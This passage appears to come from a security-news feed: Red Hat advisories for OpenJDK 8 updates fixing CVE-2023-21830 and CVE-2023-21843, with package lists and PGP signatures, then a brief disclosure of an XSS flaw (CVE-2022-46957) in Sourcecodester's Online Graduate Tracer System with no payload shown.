java-1.8.0-openjdk-devel-1.8.0.362.b09-2.el8_7.s390x.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.362.b09-2.el8_7.s390x.rpm  
java-1.8.0-openjdk-headless-1.8.0.362.b09-2.el8_7.s390x.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.362.b09-2.el8_7.s390x.rpm  
java-1.8.0-openjdk-src-1.8.0.362.b09-2.el8_7.s390x.rpm

x86_64:  
java-1.8.0-openjdk-1.8.0.362.b09-2.el8_7.x86_64.rpm  
java-1.8.0-openjdk-accessibility-1.8.0.362.b09-2.el8_7.x86_64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.362.b09-2.el8_7.x86_64.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.362.b09-2.el8_7.x86_64.rpm  
java-1.8.0-openjdk-demo-1.8.0.362.b09-2.el8_7.x86_64.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.362.b09-2.el8_7.x86_64.rpm  
java-1.8.0-openjdk-devel-1.8.0.362.b09-2.el8_7.x86_64.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.362.b09-2.el8_7.x86_64.rpm  
java-1.8.0-openjdk-headless-1.8.0.362.b09-2.el8_7.x86_64.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.362.b09-2.el8_7.x86_64.rpm  
java-1.8.0-openjdk-src-1.8.0.362.b09-2.el8_7.x86_64.rpm

Red Hat CodeReady Linux Builder (v. 8):

aarch64:  
java-1.8.0-openjdk-accessibility-fastdebug-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-accessibility-slowdebug-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-demo-fastdebug-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-demo-fastdebug-debuginfo-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-demo-slowdebug-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-demo-slowdebug-debuginfo-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-devel-fastdebug-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-devel-fastdebug-debuginfo-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-devel-slowdebug-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-devel-slowdebug-debuginfo-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-fastdebug-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-fastdebug-debuginfo-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-headless-fastdebug-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-headless-fastdebug-debuginfo-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-headless-slowdebug-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-headless-slowdebug-debuginfo-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-slowdebug-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-slowdebug-debuginfo-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-src-fastdebug-1.8.0.362.b09-2.el8_7.aarch64.rpm  
java-1.8.0-openjdk-src-slowdebug-1.8.0.362.b09-2.el8_7.aarch64.rpm

ppc64le:  
java-1.8.0-openjdk-accessibility-fastdebug-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-accessibility-slowdebug-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-demo-fastdebug-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-demo-fastdebug-debuginfo-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-demo-slowdebug-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-demo-slowdebug-debuginfo-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-devel-fastdebug-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-devel-fastdebug-debuginfo-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-devel-slowdebug-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-devel-slowdebug-debuginfo-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-fastdebug-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-fastdebug-debuginfo-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-headless-fastdebug-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-headless-fastdebug-debuginfo-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-headless-slowdebug-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-headless-slowdebug-debuginfo-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-slowdebug-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-slowdebug-debuginfo-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-src-fastdebug-1.8.0.362.b09-2.el8_7.ppc64le.rpm  
java-1.8.0-openjdk-src-slowdebug-1.8.0.362.b09-2.el8_7.ppc64le.rpm

x86_64:  
java-1.8.0-openjdk-accessibility-fastdebug-1.8.0.362.b09-2.el8_7.x86_64.rpm  
java-1.8.0-openjdk-accessibility-slowdebug-1.8.0.362.b09-2.el8_7.x86_64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.362.b09-2.el8_7.x86_64.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.362.b09-2.el8_7.x86_64.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.362.b09-2.el8_7.x86_64.rpm  
java-1.8.0-openjdk-demo-fastdebug-1.8.0.362.b09-2.el8_7.x86_64.rpm  
java-1.8.0-openjdk-demo-fastdebug-debuginfo-1.8.0.362.b09-2.el8_7.x86_64.rpm  
java-1.8.0-openjdk-demo-slowdebug-1.8.0.362.b09-2.el8_7.x86_64.rpm  
java-1.8.0-openjdk-demo-slowdebug-debuginfo-1.8.0.362.b09-2.el8_7.x86_64.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.362.b09-2.el8_7.x86_64.rpm  
java-1.8.0-openjdk-devel-fastdebug-1.8.0.362.b09-2.el8_7.x86_64.rpm  
java-1.8.0-openjdk-devel-fastdebug-debuginfo-1.8.0.362.b09-2.el8_7.x86_64.rpm  
java-1.8.0-openjdk-devel-slowdebug-1.8.0.362.b09-2.el8_7.x86_64.rpm  
java-1.8.0-openjdk-devel-slowdebug-debuginfo-1.8.0.362.b09-2.el8_7.x86_64.rpm  
java-1.8.0-openjdk-fastdebug-1.8.0.362.b09-2.el8_7.x86_64.rpm  
java-1.8.0-openjdk-fastdebug-debuginfo-1.8.0.362.b09-2.el8_7.x86_64.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.362.b09-2.el8_7.x86_64.rpm  
java-1.8.0-openjdk-headless-fastdebug-1.8.0.362.b09-2.el8_7.x86_64.rpm  
java-1.8.0-openjdk-headless-fastdebug-debuginfo-1.8.0.362.b09-2.el8_7.x86_64.rpm  
java-1.8.0-openjdk-headless-slowdebug-1.8.0.362.b09-2.el8_7.x86_64.rpm  
java-1.8.0-openjdk-headless-slowdebug-debuginfo-1.8.0.362.b09-2.el8_7.x86_64.rpm  
java-1.8.0-openjdk-slowdebug-1.8.0.362.b09-2.el8_7.x86_64.rpm  
java-1.8.0-openjdk-slowdebug-debuginfo-1.8.0.362.b09-2.el8_7.x86_64.rpm  
java-1.8.0-openjdk-src-fastdebug-1.8.0.362.b09-2.el8_7.x86_64.rpm  
java-1.8.0-openjdk-src-slowdebug-1.8.0.362.b09-2.el8_7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-21830  
https://access.redhat.com/security/cve/CVE-2023-21843  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY9L/99zjgjWX9erEAQh6/w//RI9EX2stArR4n/6NtrZFHBZEZrqbjRva  
6TJ1TC1lihoGmXbnDPeFJyh6MQx06+bqJsjVM8pYOkJKqNUmEulvWXPoN7ZSKoF4  
EKcuYOTGrKXBK0DQxK20cHnDCQU+ky2DHeIEQkdwR8P54UV47VIidc2dFbVtKgUS  
1vBpE8UZIfHIiLvfdAQ4GJN9i3SRYMT59yqcO8NRXx4y9HRHcWygCwJDBhT1f/iR  
Bhw3wMbdnb7xIxNVFHP4FTg+z6/50sZn2HP7ps+fzDQzCCB8XLKtPIc/ACkoegDg  
9kA5FS76AG68ILfPD15DEi/9qPQEvg3B0XjT9yl2EQimgraJg3CAfYDwdF3duZQd  
GORSP7R/tyCIKXkBccMcyKJ0ekNCuvgjMwmKrRdA41JcVnHqWQRQ75b8D6Lx/J1e  
0ILZlmTQkWWlyGISpV70jbkn+8RwBPDAGwoZa3Hf9CvKsv+XyprN2hztCEy7ZPRn  
Cb0Ccsuok2dmbJ07EQKo9CXNfZ/3ghAOk3fz+FR+lrFAnpzm/35TlVAGmXv4wKNS  
/PrNCaxOTr+SxR6SjLWS51UWMG+p310VBeACL8cjO67yEMboezamKezSrvjtBMPZ  
dhU56pCX1hknTxOQ6GZpUUHAX2Exk1tcuoygeeTufs2Vy5fyDU9bd05VUj+htQH4  
hKYGWAz0KmQ=  
=EqEP  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0208-01

Red Hat Security Advisory 2023-0210-01 - The java-1.8.0-openjdk packages provide the OpenJDK 8 Java Runtime Environment and the OpenJDK 8 Java Software Development Kit. Issues addressed include a deserialization vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: java-1.8.0-openjdk security and bug fix update  
Advisory ID:       RHSA-2023:0210-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0210  
Issue date:        2023-01-26  
CVE Names:         CVE-2023-21830 CVE-2023-21843   
=====================================================================

1. Summary:

An update for java-1.8.0-openjdk is now available for Red Hat Enterprise  
Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder (v. 9) - aarch64, ppc64le, x86_64  
Red Hat Enterprise Linux AppStream (v. 9) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The java-1.8.0-openjdk packages provide the OpenJDK 8 Java Runtime  
Environment and the OpenJDK 8 Java Software Development Kit.

Security Fix(es):

* OpenJDK: improper restrictions in CORBA deserialization (Serialization,  
8285021) (CVE-2023-21830)

* OpenJDK: soundbank URL remote loading (Sound, 8293742) (CVE-2023-21843)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* Prepare for the next quarterly OpenJDK upstream release (2023-01, 8u362)  
[rhel-9] (BZ#2159912)

* solr broken due to access denied ("java.io.FilePermission"  
"/etc/pki/java/cacerts" "read") [rhel-9, openjdk-8] (BZ#2163594)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of OpenJDK Java must be restarted for this update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2159912 - Prepare for the next quarterly OpenJDK upstream release (2023-01, 8u362) [rhel-9] [rhel-9.1.0.z]  
2160475 - CVE-2023-21843 OpenJDK: soundbank URL remote loading (Sound, 8293742)  
2160490 - CVE-2023-21830 OpenJDK: improper restrictions in CORBA deserialization (Serialization, 8285021)  
2163594 - solr broken due to access denied ("java.io.FilePermission" "/etc/pki/java/cacerts" "read") [rhel-9, openjdk-8] [rhel-9.1.0.z]

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
java-1.8.0-openjdk-1.8.0.362.b09-2.el9_1.src.rpm

aarch64:  
java-1.8.0-openjdk-1.8.0.362.b09-2.el9_1.aarch64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.362.b09-2.el9_1.aarch64.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.362.b09-2.el9_1.aarch64.rpm  
java-1.8.0-openjdk-demo-1.8.0.362.b09-2.el9_1.aarch64.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.362.b09-2.el9_1.aarch64.rpm  
java-1.8.0-openjdk-devel-1.8.0.362.b09-2.el9_1.aarch64.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.362.b09-2.el9_1.aarch64.rpm  
java-1.8.0-openjdk-headless-1.8.0.362.b09-2.el9_1.aarch64.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.362.b09-2.el9_1.aarch64.rpm  
java-1.8.0-openjdk-src-1.8.0.362.b09-2.el9_1.aarch64.rpm

noarch:  
java-1.8.0-openjdk-javadoc-1.8.0.362.b09-2.el9_1.noarch.rpm  
java-1.8.0-openjdk-javadoc-zip-1.8.0.362.b09-2.el9_1.noarch.rpm

ppc64le:  
java-1.8.0-openjdk-1.8.0.362.b09-2.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.362.b09-2.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.362.b09-2.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-demo-1.8.0.362.b09-2.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.362.b09-2.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-devel-1.8.0.362.b09-2.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.362.b09-2.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-headless-1.8.0.362.b09-2.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.362.b09-2.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-src-1.8.0.362.b09-2.el9_1.ppc64le.rpm

s390x:  
java-1.8.0-openjdk-1.8.0.362.b09-2.el9_1.s390x.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.362.b09-2.el9_1.s390x.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.362.b09-2.el9_1.s390x.rpm  
java-1.8.0-openjdk-demo-1.8.0.362.b09-2.el9_1.s390x.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.362.b09-2.el9_1.s390x.rpm  
java-1.8.0-openjdk-devel-1.8.0.362.b09-2.el9_1.s390x.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.362.b09-2.el9_1.s390x.rpm  
java-1.8.0-openjdk-headless-1.8.0.362.b09-2.el9_1.s390x.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.362.b09-2.el9_1.s390x.rpm  
java-1.8.0-openjdk-src-1.8.0.362.b09-2.el9_1.s390x.rpm

x86_64:  
java-1.8.0-openjdk-1.8.0.362.b09-2.el9_1.x86_64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.362.b09-2.el9_1.x86_64.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.362.b09-2.el9_1.x86_64.rpm  
java-1.8.0-openjdk-demo-1.8.0.362.b09-2.el9_1.x86_64.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.362.b09-2.el9_1.x86_64.rpm  
java-1.8.0-openjdk-devel-1.8.0.362.b09-2.el9_1.x86_64.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.362.b09-2.el9_1.x86_64.rpm  
java-1.8.0-openjdk-headless-1.8.0.362.b09-2.el9_1.x86_64.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.362.b09-2.el9_1.x86_64.rpm  
java-1.8.0-openjdk-src-1.8.0.362.b09-2.el9_1.x86_64.rpm

Red Hat CodeReady Linux Builder (v. 9):

aarch64:  
java-1.8.0-openjdk-debuginfo-1.8.0.362.b09-2.el9_1.aarch64.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.362.b09-2.el9_1.aarch64.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.362.b09-2.el9_1.aarch64.rpm  
java-1.8.0-openjdk-demo-fastdebug-1.8.0.362.b09-2.el9_1.aarch64.rpm  
java-1.8.0-openjdk-demo-fastdebug-debuginfo-1.8.0.362.b09-2.el9_1.aarch64.rpm  
java-1.8.0-openjdk-demo-slowdebug-1.8.0.362.b09-2.el9_1.aarch64.rpm  
java-1.8.0-openjdk-demo-slowdebug-debuginfo-1.8.0.362.b09-2.el9_1.aarch64.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.362.b09-2.el9_1.aarch64.rpm  
java-1.8.0-openjdk-devel-fastdebug-1.8.0.362.b09-2.el9_1.aarch64.rpm  
java-1.8.0-openjdk-devel-fastdebug-debuginfo-1.8.0.362.b09-2.el9_1.aarch64.rpm  
java-1.8.0-openjdk-devel-slowdebug-1.8.0.362.b09-2.el9_1.aarch64.rpm  
java-1.8.0-openjdk-devel-slowdebug-debuginfo-1.8.0.362.b09-2.el9_1.aarch64.rpm  
java-1.8.0-openjdk-fastdebug-1.8.0.362.b09-2.el9_1.aarch64.rpm  
java-1.8.0-openjdk-fastdebug-debuginfo-1.8.0.362.b09-2.el9_1.aarch64.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.362.b09-2.el9_1.aarch64.rpm  
java-1.8.0-openjdk-headless-fastdebug-1.8.0.362.b09-2.el9_1.aarch64.rpm  
java-1.8.0-openjdk-headless-fastdebug-debuginfo-1.8.0.362.b09-2.el9_1.aarch64.rpm  
java-1.8.0-openjdk-headless-slowdebug-1.8.0.362.b09-2.el9_1.aarch64.rpm  
java-1.8.0-openjdk-headless-slowdebug-debuginfo-1.8.0.362.b09-2.el9_1.aarch64.rpm  
java-1.8.0-openjdk-slowdebug-1.8.0.362.b09-2.el9_1.aarch64.rpm  
java-1.8.0-openjdk-slowdebug-debuginfo-1.8.0.362.b09-2.el9_1.aarch64.rpm  
java-1.8.0-openjdk-src-fastdebug-1.8.0.362.b09-2.el9_1.aarch64.rpm  
java-1.8.0-openjdk-src-slowdebug-1.8.0.362.b09-2.el9_1.aarch64.rpm

ppc64le:  
java-1.8.0-openjdk-debuginfo-1.8.0.362.b09-2.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.362.b09-2.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.362.b09-2.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-demo-fastdebug-1.8.0.362.b09-2.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-demo-fastdebug-debuginfo-1.8.0.362.b09-2.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-demo-slowdebug-1.8.0.362.b09-2.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-demo-slowdebug-debuginfo-1.8.0.362.b09-2.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.362.b09-2.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-devel-fastdebug-1.8.0.362.b09-2.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-devel-fastdebug-debuginfo-1.8.0.362.b09-2.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-devel-slowdebug-1.8.0.362.b09-2.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-devel-slowdebug-debuginfo-1.8.0.362.b09-2.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-fastdebug-1.8.0.362.b09-2.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-fastdebug-debuginfo-1.8.0.362.b09-2.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.362.b09-2.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-headless-fastdebug-1.8.0.362.b09-2.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-headless-fastdebug-debuginfo-1.8.0.362.b09-2.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-headless-slowdebug-1.8.0.362.b09-2.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-headless-slowdebug-debuginfo-1.8.0.362.b09-2.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-slowdebug-1.8.0.362.b09-2.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-slowdebug-debuginfo-1.8.0.362.b09-2.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-src-fastdebug-1.8.0.362.b09-2.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-src-slowdebug-1.8.0.362.b09-2.el9_1.ppc64le.rpm

x86_64:  
java-1.8.0-openjdk-debuginfo-1.8.0.362.b09-2.el9_1.x86_64.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.362.b09-2.el9_1.x86_64.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.362.b09-2.el9_1.x86_64.rpm  
java-1.8.0-openjdk-demo-fastdebug-1.8.0.362.b09-2.el9_1.x86_64.rpm  
java-1.8.0-openjdk-demo-fastdebug-debuginfo-1.8.0.362.b09-2.el9_1.x86_64.rpm  
java-1.8.0-openjdk-demo-slowdebug-1.8.0.362.b09-2.el9_1.x86_64.rpm  
java-1.8.0-openjdk-demo-slowdebug-debuginfo-1.8.0.362.b09-2.el9_1.x86_64.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.362.b09-2.el9_1.x86_64.rpm  
java-1.8.0-openjdk-devel-fastdebug-1.8.0.362.b09-2.el9_1.x86_64.rpm  
java-1.8.0-openjdk-devel-fastdebug-debuginfo-1.8.0.362.b09-2.el9_1.x86_64.rpm  
java-1.8.0-openjdk-devel-slowdebug-1.8.0.362.b09-2.el9_1.x86_64.rpm  
java-1.8.0-openjdk-devel-slowdebug-debuginfo-1.8.0.362.b09-2.el9_1.x86_64.rpm  
java-1.8.0-openjdk-fastdebug-1.8.0.362.b09-2.el9_1.x86_64.rpm  
java-1.8.0-openjdk-fastdebug-debuginfo-1.8.0.362.b09-2.el9_1.x86_64.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.362.b09-2.el9_1.x86_64.rpm  
java-1.8.0-openjdk-headless-fastdebug-1.8.0.362.b09-2.el9_1.x86_64.rpm  
java-1.8.0-openjdk-headless-fastdebug-debuginfo-1.8.0.362.b09-2.el9_1.x86_64.rpm  
java-1.8.0-openjdk-headless-slowdebug-1.8.0.362.b09-2.el9_1.x86_64.rpm  
java-1.8.0-openjdk-headless-slowdebug-debuginfo-1.8.0.362.b09-2.el9_1.x86_64.rpm  
java-1.8.0-openjdk-slowdebug-1.8.0.362.b09-2.el9_1.x86_64.rpm  
java-1.8.0-openjdk-slowdebug-debuginfo-1.8.0.362.b09-2.el9_1.x86_64.rpm  
java-1.8.0-openjdk-src-fastdebug-1.8.0.362.b09-2.el9_1.x86_64.rpm  
java-1.8.0-openjdk-src-slowdebug-1.8.0.362.b09-2.el9_1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-21830  
https://access.redhat.com/security/cve/CVE-2023-21843  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY9L/9NzjgjWX9erEAQhTQw/9H7aeXZ+k8JgaO+GXrNKKI8YHJRBACYuj  
Ou/dGX013q3gH5fezhFAdtmTqs1hJHSt1p3WwmKtqaQjyFF4MUDdCcRdrSk+0v5p  
PFKuuZKCjXJqeT4A3u69+GajEWq6zbNiqm+yHQQuA+ZFPlJ5bwRYOFPn+LkNNoWf  
3uBAPXa2F2ESHQ56o1mRjOhg4YLxCFHfBV4GJsxBy83C0GZXljEBH1x4qhxo1o1O  
tPziQPLsBbPECukZnp7Hy0tAZgW460Cj7rmReMq2ui5jnYniw0q2hkeFYB11iq6e  
5AcJ38QeL8iyN1z0J1IerfVBe+NmgFvNhdt7kdxokoF4CinahqlsbdU81PkItrqi  
aoGUDvzra7UXCDeZC5Qxt1OpBu1dWXTEHPqFlfmww6MijfhrLS7EqBupxXhYiJMz  
l8f3bFEnEFgfXyBPoOn5ZuTI7Fc1cCf2HjKHJUJtmpEEgv0PQ509ZL9m4nQmgWnZ  
8OJD6PI0kgAohWMxxfK06dmWOMAlxftO9VItMaDVizbm1TCv4VlILHXA6zmwa10v  
S2nDmRKoYjgkXPsYaN2MrIcCBIxhXBs7cVBLxKvVpw4UifBA7iFLUiGch4wXn3op  
iWX/5L+z+6Ohrq+ejRBuS/Q+3YecUUVsgCi6q42aUmTaCchzWa2zwft5VoxartdR  
4FZtwClNWbY=  
=FGEM  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0210-01

Sourcecodester.com Online Graduate Tracer System V 1.0.0 is vulnerable to Cross Site Scripting (XSS).

\[Suggested description\]

\> Sourcecodester.com Online Graduate Tracer System V 1.0.0 is vulnerable

\> to Cross Site Scripting (XSS).

\>

\> ------------------------------------------

\>

\> \[Vulnerability Type\]

\> Cross Site Scripting (XSS)

\>

\> ------------------------------------------

\>

\> \[Vendor of Product\]

\> https://www.sourcecodester.com

\>

\> ------------------------------------------

\>

\> \[Affected Product Code Base\]

\> Online Graduate Tracer System - V 1.0.0

\>

\> ------------------------------------------

\>

\> \[Affected Component\]

\> name=

\>

\> ------------------------------------------

\>

\> \[Attack Type\]

\> Local

\>

\> ------------------------------------------

\>

\> \[Impact Code execution\]

\> true

\>

\> ------------------------------------------

\>

\> \[Reference\]

\> https://www.sourcecodester.com/sites/default/files/download/oretnom23/tracking.zip

\>

\> ------------------------------------------

\>

\> \[Discoverer\]

\> Rajeshwar Singh

Use CVE-2022-46957

Tag

#acer